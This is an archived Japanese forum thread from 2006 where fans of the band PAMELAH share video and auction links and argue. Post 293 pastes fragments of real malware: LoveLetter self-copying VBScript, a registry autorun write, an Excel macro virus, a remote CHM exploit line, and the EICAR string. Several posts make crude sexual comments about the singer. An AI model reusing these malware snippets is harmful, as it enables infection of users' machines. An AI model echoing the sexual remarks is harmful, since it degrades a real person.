ttp://yokazaki.org/~request/karaoke.php?artist=PAMELAH

ここにパメラを登録したよ。
今「忘却の彼方」を申請中。
他にもカラオケで歌いたい曲がない人
どんどんリクエストして下さい。

178 :伝説の名無しさん:2006/06/08(木) 19:17:40
VIDEO CLIPS2のスタッフロールが流れているときの
バックでかかっている曲のタイトル教えてください

179 :伝説の名無しさん:2006/06/08(木) 19:26:43
a short lived loveじゃなかったっけか

180 :伝説の名無しさん:2006/06/09(金) 00:35:59
「キレイになんか愛せない」って
B'zの「愛のままにわがままに 僕は君だけを傷つけない」に
似てる気がする…。

181 :伝説の名無しさん:2006/06/09(金) 02:11:59
http://www.youtube.com/watch?v=N7ute7rVX-M&search=pamelah
CONFIDENCEのPVです。

182 :伝説の名無しさん:2006/06/09(金) 07:03:12
youtubeにSPIRITのCMがあがってましたわよ



183 :伝説の名無しさん:2006/06/09(金) 07:15:52
スレタイのもずって何ですか?

184 :伝説の名無しさん:2006/06/09(金) 09:56:20
>>181
イイねぇ。

185 :伝説の名無しさん:2006/06/09(金) 18:23:33
http://page.auctions.yahoo.co.jp/jp/auction/89991539

186 :伝説の名無しさん:2006/06/11(日) 15:37:57
PAMELAHシングル14枚セット
http://page6.auctions.yahoo.co.jp/jp/auction/f46648965

187 :167:2006/06/12(月) 19:40:21
昨日、町田のブクオフにて「LOVE IS PAIN」105円でゲト

188 :伝説の名無しさん:2006/06/13(火) 12:08:00
>>187
新品で買ったれよ
由貴ちゃんに印税入らんとかわいそう
http://www.tsutaya.co.jp/item/music/view_m.zhtml?pdid=20009932

189 :伝説の名無しさん:2006/06/15(木) 16:04:29
ぬーべーage

190 :伝説の名無しさん:2006/06/15(木) 20:54:36
ちょwwまてwwww
ISM放置とかマジもったないってば
小澤さんがギターにこだわってるから聞きこんでみて!!
昔の方がいいというのもあるけど
パメラが出したということには変わりないし、イイ曲だから!!

191 :伝説の名無しさん:2006/06/17(土) 03:02:22
由貴タン 由貴タン

192 :伝説の名無しさん:2006/06/17(土) 13:21:21
>>190
ismは悪くないって程度だなぁ。
全体的に重苦しい。サウンドに凝りすぎてVocalが潰されてる感じがするんだ。

193 :伝説の名無しさん:2006/06/17(土) 15:39:46
なんかわかる気がする
ボーカルが一枚後ろにある感じ
曲もボーカルもいいのに音が薄っぺらい気がする
もっと子宮に響く音ならいいのにって思ってました

194 :伝説の名無しさん:2006/06/17(土) 17:41:24
包茎女さんだ!

195 :伝説の名無しさん:2006/06/17(土) 19:04:46
ismはDQNがウーハー使ってズンズン楽しむような音だからなあ
全体的にボケて聞こえてしまう

196 :伝説の名無しさん:2006/06/18(日) 10:14:46
もずって?

197 :伝説の名無しさん:2006/06/18(日) 10:40:30
M(asazumi)oZ(awa)

Masazumi Ozawa

198 :伝説の名無しさん:2006/06/18(日) 20:04:23
由貴タンのオパーイ

199 :伝説の名無しさん:2006/06/18(日) 21:11:16
下品やな

200 : ◆qryFfkcMhc :2006/06/18(日) 23:52:22
死ねじ200

201 :伝説の名無しさん:2006/06/19(月) 12:02:54
>>199
由貴タソ巨乳なの知らないのかな?

202 :伝説の名無しさん:2006/06/19(月) 16:09:16
パメラのPVって全然金かかってないね。。
ずっと同じ場所でくねくねしながらおどってるだけw

203 :伝説の名無しさん:2006/06/19(月) 17:01:48
I FEEL DOWNを出す前にダンスの特訓をしたゆきたん萌

204 :伝説の名無しさん:2006/06/19(月) 22:01:47
>>202
許してやって
でもパメラおっぱい聖人はそのクネクネで
肉密度が増すのさ。

205 :伝説の名無しさん:2006/06/20(火) 14:52:19
由貴のマンコ舐めたい。匂い嗅ぎたい。臭かったら嬉しい。

206 :伝説の名無しさん:2006/06/21(水) 22:29:17
伝説のまんこ


207 :伝説の名無しさん:2006/06/21(水) 23:36:41
水原由貴って函館出身らしいけど、ジュディマリのYUKIとつながりあんのかな?

208 :伝説の名無しさん:2006/06/22(木) 21:28:10
http://page6.auctions.yahoo.co.jp/jp/auction/f43961834

209 :伝説の名無しさん:2006/06/23(金) 01:06:54



210 : ◆S5xxKEn4sw :2006/06/23(金) 01:07:36
しねじ210

211 :伝説の名無しさん:2006/06/23(金) 11:40:04
動画持ってるヤシ、どんどんぅpしていこう!
出し惜しみせず、どんどんぅpしていこう!

212 :伝説の名無しさん:2006/06/23(金) 15:39:33
由貴のおっぱいモミモミして乳首に吸いついてミルク飲みたい

213 :伝説の名無しさん:2006/06/23(金) 22:15:20
>>211
まずはお前がアップしろ。

214 :伝説の名無しさん:2006/06/24(土) 01:40:25
由貴タソ以上の女神には未だ出会えない。マジ最強

215 :伝説の名無しさん:2006/06/24(土) 10:27:16
>>213
持ってなひ

216 :伝説の名無しさん:2006/06/24(土) 20:43:25
とりあえず何の動画が欲しいのだ?

217 :伝説の名無しさん:2006/06/24(土) 22:22:14
谷間みせまくってたな。カウントダウンテレビで。抜いたことあるぞ。

218 :伝説の名無しさん:2006/06/25(日) 01:39:14
>>217

ホスィ…

219 :伝説の名無しさん:2006/06/25(日) 02:31:53
ようつべ増えてた

PAMELAH CONFIDENCE 【PV】
http://www.youtube.com/watch?v=N7ute7rVX-M

PAMELAH-LOOKIN
http://www.youtube.com/watch?v=cyQjtTL1hf4

PAMELAH「I FEEL DOWN」
http://www.youtube.com/watch?v=3EJVGsiz9Zc

PAMELAH「スピリット」
http://www.youtube.com/watch?v=qsJEv6zzigI

220 :伝説の名無しさん:2006/06/25(日) 13:25:58
ぬ〜べ〜が終わった後によくそのSPIRITのCM流れてた。
そのCM見るたびに切なくなってた。


221 :伝説の名無しさん:2006/06/26(月) 08:05:33
由貴たん・・

222 :伝説の名無しさん:2006/06/26(月) 08:48:14
あ、またようつべ一つ増えたね

223 :伝説の名無しさん:2006/06/26(月) 08:50:30
なんだぬ〜べ〜か・・ orz

224 :伝説の名無しさん:2006/06/26(月) 09:01:20
つーか、CONFIDENCE消えてる!!!!!11!11!

225 :ささ:2006/06/26(月) 10:23:36
オレXの曲ドラムで叩けるよ


226 :伝説の名無しさん:2006/06/27(火) 20:02:28
Mステの綺麗な動画「I FEEL DOWN」ありませんか?

227 :伝説の名無しさん:2006/06/28(水) 06:55:45
>>226
確かに画質悪いけどな。画箱に一つあった希ガス。

228 :伝説の名無しさん:2006/06/29(木) 22:40:16
期待age

229 :こんなスレがあったなんて・・・:2006/07/01(土) 02:10:49
数年前にも違う板の「偶然の一致体験」みたいなスレに書いたことがあったんですが、専用のスレを見つけたのでここでまた改めて書かせてください。
私は1981年生まれ、今年25歳の女です。私の名字なんですが、すっっっごい変な名字で物心ついた時からその事でいじめられてて大人になってからも
病院で名前呼ばれると笑いが起こってしまうこともよくあります(特に小さい子供)。94年から97年までPAMELAHの熱狂的なFANでした。
中学のとき猛烈ファンになって、学校では友達とこのことしか話さなかったし、校内で私一人しかパメラのファンがいないのに
たった一人で盛り上がってました。それは中学3年の終わりの事です。雑誌(結構有名な)でパメラのテレカの懸賞の応募があったので迷わず応募しました。
抽選で2名だったけどまあファン自体が少ないし当たるかもと思って出したら、案の定当たっていて
数ヶ月雑誌の「懸賞に当たった人」の名前欄に私の名前が載っていました。そこを見てびっくり!!
なんともう一人の当選者も私と同じ名字だったのです!!もちろん下の名前は違っていたけど、見た瞬間、愕然としました。変な名字が二つ並んでいるのもすごく変だったし
それからずーっと漠然と悩んでました。もしかしたらパメラって、変な名字の人が好きになるバンドなのか・・・とか思ったりしてね。
その一件があってからなんだか恥ずかしくなってきてそれから数ヶ月後にファンを辞めてしまいました・・・。今でもパメラの音楽聞くとその事を思い出してしまう。
今でもあれはなんだったんだろうと思います。私の名字はとても変な上に珍しく、校内でも私一人しかいなかったし、びっくりです。

230 :伝説の名無しさん:2006/07/01(土) 02:50:53
どうか神様、携帯厨の俺にPVを下さい…

231 :伝説の名無しさん:2006/07/01(土) 19:33:43
>>229
何とも胃炎・・・ コピペかな?

232 :229:2006/07/02(日) 00:04:28
いえ、コピペじゃないです。生活板の「すごい偶然の一致」スレにもパメラだとは明かさずに書いた事が
昔、あります。

233 :伝説の名無しさん:2006/07/02(日) 00:27:27
なるほど。結局は自分と同じ苗字の人が、懸賞に当選してたと言う事ですか。
やっぱり何とも胃炎・・・
いや、差し支えなければあなたの名字を教えてplz

234 :伝説の名無しさん:2006/07/02(日) 04:35:38
Mステの綺麗な動画「I FEEL DOWN」求む


235 :伝説の名無しさん:2006/07/02(日) 04:42:00
Mステ出演時の演奏をカセットに録音したけどどこいっちゃったんだろ…

236 :229:2006/07/02(日) 06:06:08
その一件があったときから、パメラは変な名字の人しかファンがいないのかなーってずっと悩んでいます。
ここにカキコしてる皆さんは、別に普通の名字なのですか?

237 :伝説の名無しさん:2006/07/02(日) 09:19:18
御御黒武(おみくろん)言います

238 :伝説の名無しさん:2006/07/02(日) 10:52:46
勅使河原(てしがわら)言います

239 :伝説の名無しさん:2006/07/02(日) 18:19:16
小比類巻

240 :伝説の名無しさん:2006/07/02(日) 18:19:32
俺は小澤

241 :伝説の名無しさん:2006/07/02(日) 18:46:15
>>235
ぅpぅp! 是非ZIPでーくれ!

242 :伝説の名無しさん:2006/07/02(日) 20:36:38
youtubeにキレイになんか愛せないがうpされてるね。
口パクだが

243 :伝説の名無しさん:2006/07/02(日) 21:06:42
千葉テレヴィ… またkasumiぅpか彼は神だな。

244 :伝説の名無しさん:2006/07/02(日) 21:22:49
>>242
あれ口パク?mjd?
カメラ目線でパンチするとこ可愛い。

245 :伝説の名無しさん:2006/07/02(日) 22:13:29
お礼してきた。

246 :阿波連:2006/07/03(月) 12:38:35
http://page11.auctions.yahoo.co.jp/jp/auction/n38942521

247 :阿波連:2006/07/03(月) 12:52:36
http://www.youtube.com/watch?v=A78YFhBH6hY&search=PAMELAH

248 :伝説の名無しさん:2006/07/03(月) 15:27:27
>>246-247
お前は何がしたいの?

249 :阿波連:2006/07/03(月) 23:49:24
>>248
騎乗位で由貴ちゃんの巨乳を思う存分揉みまくりながら射精がしたい

250 :伝説の名無しさん:2006/07/03(月) 23:59:45
>>249
漏れが居るから無理です。どうか諦めてくらはい。

251 :伝説の名無しさん:2006/07/04(火) 02:26:43
>>250
小澤乙

252 :伝説の名無しさん:2006/07/04(火) 13:15:04
ち、違います!

253 :伝説の名無しさん:2006/07/04(火) 16:10:21
Mステの綺麗な動画「I FEEL DOWN」求む

254 :伝説の名無しさん:2006/07/04(火) 17:25:43
>>253
しつけぇwwwwww

255 :伝説の名無しさん:2006/07/04(火) 22:18:45
おまいら、またようつべにぅpされたみたいですよ。

256 :伝説の名無しさん:2006/07/05(水) 02:18:24
http://www.youtube.com/watch?v=g3uwre_36FU
ぅpしてもすぐに反映されないみたい…

257 :伝説の名無しさん:2006/07/05(水) 02:23:14
音痴じゃんwwwwwwwwwwwwwwwwww

258 :伝説の名無しさん:2006/07/05(水) 04:48:14
どこが?完璧じゃん。

259 :伝説の名無しさん:2006/07/05(水) 09:47:30
あらためてかわゆいとおもった

260 :伝説の名無しさん :2006/07/05(水) 10:42:07
小澤正澄に手がけてほしいといえば…
作曲・編曲…
KAT-TUN、DEEN、山下智久、モーニング娘。、Berryz工房、松浦亜弥、島谷ひとみ、
上木彩矢、菅崎茜、滴草由実、時東ぁみ
編曲のみ…
TUBE、高岡亜衣、大塚愛

261 :伝説の名無しさん:2006/07/05(水) 14:36:34
>>260
DEENにだけ同意。
他は屁過ぎる。小澤が可哀相だよ。

262 :伝説の名無しさん:2006/07/05(水) 14:47:07
>>259
漏れ俺も

263 :伝説の名無しさん:2006/07/05(水) 15:57:15
>>260
その面子でお遊戯でもやるの?っていうくらいウンコ

264 :伝説の名無しさん:2006/07/05(水) 19:02:52
つーか、以前から必死でアイドルの名前出してる香具師って何?釣り?
ぶっちゃけ面白くないんだけど

265 :伝説の名無しさん:2006/07/05(水) 19:17:03
>>263
オマエガナー
>>264
我慢しる

266 :伝説の名無しさん:2006/07/05(水) 19:29:52
>>226 >>234 >>253
kasumi30Dと直接コンタクト取ればいいんじゃね?

267 :伝説の名無しさん:2006/07/05(水) 20:13:38
>>265
死ねwwwwwwwwwwwwwww

268 :伝説の名無しさん:2006/07/05(水) 22:18:39
>>265はハロプロ(笑)ヲタ

269 :伝説の名無しさん:2006/07/06(木) 00:00:18
>>256 おお!サンクス!このスレに来た途端一番ようつべしてほしかったのが上がってたw

270 :伝説の名無しさん:2006/07/06(木) 00:06:23
( ^ω^)>>80をもう一度クレクレ

271 :伝説の名無しさん:2006/07/06(木) 08:04:31
>>267
オマエガナー
>>268は真のハロプロヲタ

272 :伝説の名無しさん:2006/07/06(木) 09:52:46
(´・ω・`)早く>>80クレクレ

273 :伝説の名無しさん:2006/07/06(木) 09:57:06
>>ブタの272
 http://cocoa.gazo-ch.net/bbs/10/img/200510/456547.jpg

274 :伝説の名無しさん:2006/07/06(木) 10:12:48
>>273
(^ω^;)うざい氏ねお

275 :伝説の名無しさん:2006/07/06(木) 10:35:58
>>ブタの274
http://cocoa.gazo-ch.net/bbs/18/img/200403/40438.jpg

276 :伝説の名無しさん:2006/07/06(木) 10:45:40
>>270
お前142だろ
やらねぇよ

277 :伝説の名無しさん:2006/07/06(木) 10:53:11
ブタは死になさい

278 :伝説の名無しさん:2006/07/06(木) 15:01:38
>>80は大した事なかったよ。
1分30秒くらいで途中で切れてたと記憶してる。

279 :伝説の名無しさん:2006/07/06(木) 15:02:36
>>269
ぅpした本人にお礼を言うと喜ぶと思ふ。

280 :伝説の名無しさん:2006/07/06(木) 15:11:06
>>276
( ^ω^)それは別人だお
( ^ω^)おまいは氏んでいいお

281 :伝説の名無しさん:2006/07/06(木) 15:11:59
( ^ω^)クレるまで粘着するお

282 :伝説の名無しさん:2006/07/06(木) 16:39:57
おまいが先にお礼の動画ぅp汁!
誰がタダでやるかヴァカwwwww

283 :たかちん:2006/07/06(木) 21:41:37
>>260を書いた者ですが、荒れてしまったので>>260の書き込みの内容はは撤回します

284 :( ^ω^):2006/07/06(木) 21:51:07
たかちんキタ━━━━wwヘ√レvv〜(゚∀゚)―wwヘ√レvv〜―━━━━!!!!

285 :たかちん:2006/07/07(金) 09:20:08
今後は、PAMELAHについて有益な情報を交換しましょう

286 :伝説の名無しさん:2006/07/07(金) 16:32:42
じゃ綺麗な動画アップして!

287 :伝説の名無しさん:2006/07/07(金) 16:34:23
>>285
じゃあ、何か情報あんの?

288 :伝説の名無しさん:2006/07/07(金) 17:24:35
好きなジャケ写
ttp://www.being.co.jp/pamelah/disco/sl/slimag/sl12.jpg

289 :伝説の名無しさん:2006/07/07(金) 23:40:35
包茎女さん見てる?

290 :伝説の名無しさん:2006/07/08(土) 10:45:00
見てるよ

291 :伝説の名無しさん:2006/07/11(火) 00:14:13
age

292 :伝説の名無しさん:2006/07/13(木) 04:33:39
ひでぇ過疎age

293 :伝説の名無しさん:2006/07/13(木) 07:24:44
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

294 :伝説の名無しさん:2006/07/13(木) 15:08:15
ウイルスコードらしきもの注意

295 :伝説の名無しさん:2006/07/14(金) 00:47:55
ノートン様が守って下さった。


296 :伝説の名無しさん:2006/07/14(金) 03:37:08
いや、由貴たんが守ってくれたんだと思われ。由貴たんは偉大なり。

297 :伝説の名無しさん:2006/07/14(金) 09:12:46
music freak magazine サポーターズコンベンションVol.2
『COUNTDOWN BEING PARTY』開催決定!

(略)
そして第2回目となる今回は、通販事業部で販売し好評を頂いてるコンビレーション・アルバム
『COUNTDOWN BEING』と連動し、収録曲のカヴァー・ライブ、題して、『COUNTDOWN BEING
PARTY』を開催する事となりました。
B'z、ZARD、WANDS、T-BOLAN、Mi-Ke、大黒摩季などの、90年代を代表する名曲のカヴァー
・ライブ。(当日の詳しい演奏曲はまだ未定)
是非多くの方のご参加をお待ちしてます!

■タイトル:music freak magazineサポーターズコンベンションvol.2『COUNTDOWN BEING PARTY』
■日時:06年9月9日(土) 開場:17:30/開演:18:00
■場所:大阪hillsパン工場cafe B2 (大阪市北区西堀江1-3-17)
■料金:3,500円(1drink付)
■出演アーティスト:三枝夕夏 IN db、北原愛子、竹井詩織里、荒神直規


298 :伝説の名無しさん:2006/07/14(金) 19:54:54
なんだよ!ネットカフェからようつべ見れねえ!

・・・プロモ見たことないから見てみたかったのにorz
DVD化激しく希望。
もう解散してるアーティストは無理なんかな・・・。

299 :伝説の名無しさん:2006/07/14(金) 21:56:52



300 : ◆meGxCOFT92 :2006/07/14(金) 21:57:40
しねじ300

301 :伝説の名無しさん:2006/07/15(土) 03:31:44
>>298
Beingに就職して、是非未公開映像DVD発売してくれ

302 :伝説の名無しさん:2006/07/15(土) 04:11:33
由貴ちゃんて今何歳?30いったかな?
もう結婚しちゃったんだろうか。
なにしてんだろうなー。
復帰しないかなー。

303 :伝説の名無しさん:2006/07/15(土) 08:28:32
もう40近いよ

304 :伝説の名無しさん:2006/07/15(土) 12:23:46
>>288見て思ったんだが、PAMELAHのシングルってもう入手不可なんかな?
カップリングとかアルバムに収録されてないものも多いし…。
つか、PAMELAHのシングルって全部8センチ?

305 :伝説の名無しさん:2006/07/15(土) 12:42:27
>>304
ブクオフとかで普通に売ってる件
全部8です。

306 :伝説の名無しさん:2006/07/15(土) 14:09:04
8cm扱ってるブクオフ自体が少なくなってきてる件。

ここ2年くらい頑張って収集してるが、キズナ以降のシングルが見つからない…。
コンプリートベストにカップリングもいくつか入れてくれれば良かったんだけど。

ソロシングルは何回か見掛けるのはやっぱりマキシだからなのかな?

307 :伝説の名無しさん:2006/07/15(土) 14:10:20
>>301
売れる、見込みのないもの、売れないね
この過疎、見れば、明白ね
でも、見たい、売って欲しいね

308 :伝説の名無しさん:2006/07/15(土) 14:46:09
>>306
それはありますね。
オークションとかネットで集めるしかないかも試練。

309 :伝説の名無しさん:2006/07/15(土) 15:47:33
>>306
ガンガレお(^ω^)

310 :伝説の名無しさん:2006/07/18(火) 03:43:25
上げてみる

311 :伝説の名無しさん:2006/07/19(水) 18:45:39
上げ上げ

312 :伝説の名無しさん:2006/07/19(水) 19:44:17
>>306
地元のブックオフ、さらに隣の市のブックオフ、県内でも大きいブックオフ、隣の県のブックオフと探したが、ソロシングルが見つからないorz
っつか、8センチを取り扱ってる店がない…。

313 :伝説の名無しさん:2006/07/19(水) 20:43:24
>>312
つオークション

314 :伝説の名無しさん:2006/07/19(水) 21:50:42
最近ようつべでぬーべーのED見たんだが、PAMELAH聞くようになってから改めて見ると、なんかいいな。
歌とゆきめの気持ちがマッチしてる。
これはやっぱり、アニメのEDの依頼が来てから曲作ったのか?
それともタイアップの話のほうが後?

315 :伝説の名無しさん:2006/07/19(水) 22:42:36
なんで、一番最初にマンコなの!?

316 :伝説の名無しさん:2006/07/19(水) 23:41:50
>>1366655556959528282828282455346296288

317 :伝説の名無しさん:2006/07/20(木) 00:44:57
>>314 作った後で依頼が来たんだと思うよ!!
それよりプロモ見たくてたまらないんだけどオクとかで誰か出品してくんねぇかな…

318 :伝説の名無しさん:2006/07/20(木) 01:01:38
>>315
ありがたいだろ?

319 :伝説の名無しさん:2006/07/20(木) 06:55:33
http://page11.auctions.yahoo.co.jp/jp/auction/n38942521

320 :伝説の名無しさん:2006/07/20(木) 16:52:54
ようつべに画箱のぅpしてみた。
http://www.youtube.com/watch?v=jInSHimEt6Q

321 : ◆kfmQWWurcA :2006/07/20(木) 19:44:07
しめじ321

322 :伝説の名無しさん:2006/07/20(木) 22:34:38
涙といとしいキミもあるのでその内ぅpします。

323 :伝説の名無しさん:2006/07/20(木) 23:45:22
>>320
良い人だ。ありがとう。

324 :伝説の名無しさん:2006/07/21(金) 11:06:36
>>323
どういたしましてww
涙です。
http://www.youtube.com/watch?v=h90afitCZBw

325 :伝説の名無しさん:2006/07/21(金) 13:40:32
>>324
綺麗な動画ありがとー!
あなたは神だ!

いままで上げてくれた人動画汚かったから。。。


326 :伝説の名無しさん:2006/07/21(金) 13:57:03
>>325
どういたしまして
何故かこれでもちょっと汚くなってるのが残念ですが…

327 :伝説の名無しさん:2006/07/21(金) 21:39:58
いとしいキミです。どうぞ。
http://www.youtube.com/watch?v=kJW_YcN681Y

328 :伝説の名無しさん:2006/07/22(土) 00:45:07
pvもあるんですけど、ぅpはヤヴァイですかね…?

329 :伝説の名無しさん:2006/07/22(土) 02:20:00
たぶん。

330 :伝説の名無しさん:2006/07/22(土) 08:03:05
>>328
youtubeじゃなく普通のところにあげれば?


331 :伝説の名無しさん:2006/07/22(土) 11:19:50
>>329-330
分かりました。止めときます。
過疎ってるしね…。

332 :伝説の名無しさん:2006/07/23(日) 04:22:26



333 : ◆QDtCLeDgRk :2006/07/23(日) 04:23:07
しねじ333

334 :伝説の名無しさん:2006/07/24(月) 01:14:56
age

335 :伝説の名無しさん:2006/07/24(月) 02:09:40
だれやねん!ウィルス撒いたダボは!

336 :伝説の名無しさん:2006/07/24(月) 12:12:14
>>335
あれはただノートンを誤作動させるだけのコード
ウイルスじゃない

337 :伝説の名無しさん:2006/07/24(月) 22:31:41
動画持ってる人、どんどんうpしてこう!!
出し惜しみせずに、どんどんうpしてこう!!

338 :伝説の名無しさん:2006/07/24(月) 23:24:58
断る

339 :伝説の名無しさん:2006/07/25(火) 07:27:15
ですよね

340 :伝説の名無しさん:2006/07/25(火) 09:26:57
ヤフオクでプロモを買えばいい

341 :伝説の名無しさん:2006/07/25(火) 11:36:45
>>338-340
せこっ

342 :伝説の名無しさん:2006/07/25(火) 11:57:57
つーか乞食ブタ氏ねよ…

343 :伝説の名無しさん:2006/07/25(火) 19:46:41
動画持ってる人、どんどんうpしてこう!!
出し惜しみせずに、どんどんうpしてこう!!


344 :伝説の名無しさん:2006/07/26(水) 00:19:31
だが断る

345 :伝説の名無しさん:2006/07/26(水) 01:00:22
ですよね

346 :伝説の名無しさん:2006/07/26(水) 04:09:35
ヤフオクでプロモを買えばいい

347 :伝説の名無しさん:2006/07/26(水) 05:31:31
>>344-346
せこっ

348 :伝説の名無しさん:2006/07/26(水) 05:32:12
つーか乞食ブタ氏ねよ…

349 :伝説の名無しさん:2006/07/26(水) 08:39:20
動画持ってる人、どんどんうpしてこう!!
出し惜しみせずに、どんどんうpしてこう!!

350 :伝説の名無しさん:2006/07/26(水) 09:37:40
もういい加減に汁!!!wwwww

351 :無名アイドルくん :2006/07/26(水) 13:15:33
>>283
うそです。

352 :伝説の名無しさん:2006/07/27(木) 06:41:12
ようつべにpvぅpしたんですが、いとしいキミのサムネが残念な結果に…
msのぅpしちゃっただし、ぅpします。皆様もぅpどうぞ…。

353 :伝説の名無しさん:2006/07/27(木) 07:20:15
   _、_
 ( ,_ノ` )      n
 ̄     \    ( E) GK!!!
フ     /ヽ ヽ_//


354 :伝説の名無しさん:2006/07/27(木) 12:45:29
動画持ってる人、もっともっとうpしてこう!!
出し惜しみせずに、もっともっとうpしてこう!!

355 :伝説の名無しさん:2006/07/27(木) 16:20:17
そろそろビーイングにようつべのことを通報する頃合かもしれん。

356 :伝説の名無しさん:2006/07/27(木) 16:48:17
ですよね

357 :伝説の名無しさん:2006/07/27(木) 17:54:58
ヤフオクでプロモを買えばいい

358 :伝説の名無しさん:2006/07/28(金) 10:12:04
>>355-357
せこっ

359 :伝説の名無しさん:2006/07/28(金) 10:14:48
つーかビーイング以外の会社にも通報しまくる頃合かも試練。

360 :伝説の名無しさん:2006/07/28(金) 10:17:36
エイベックスファンの私がきましたが何か。

361 :伝説の名無しさん:2006/07/28(金) 10:19:43
>>360
スレ違い。何もない。巣へ帰りなさい。

362 :伝説の名無しさん:2006/07/28(金) 15:40:07
動画持ってる人、全部全部うpしてこう!!
出し惜しみせずに、全部全部うpしてこう!!

62 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)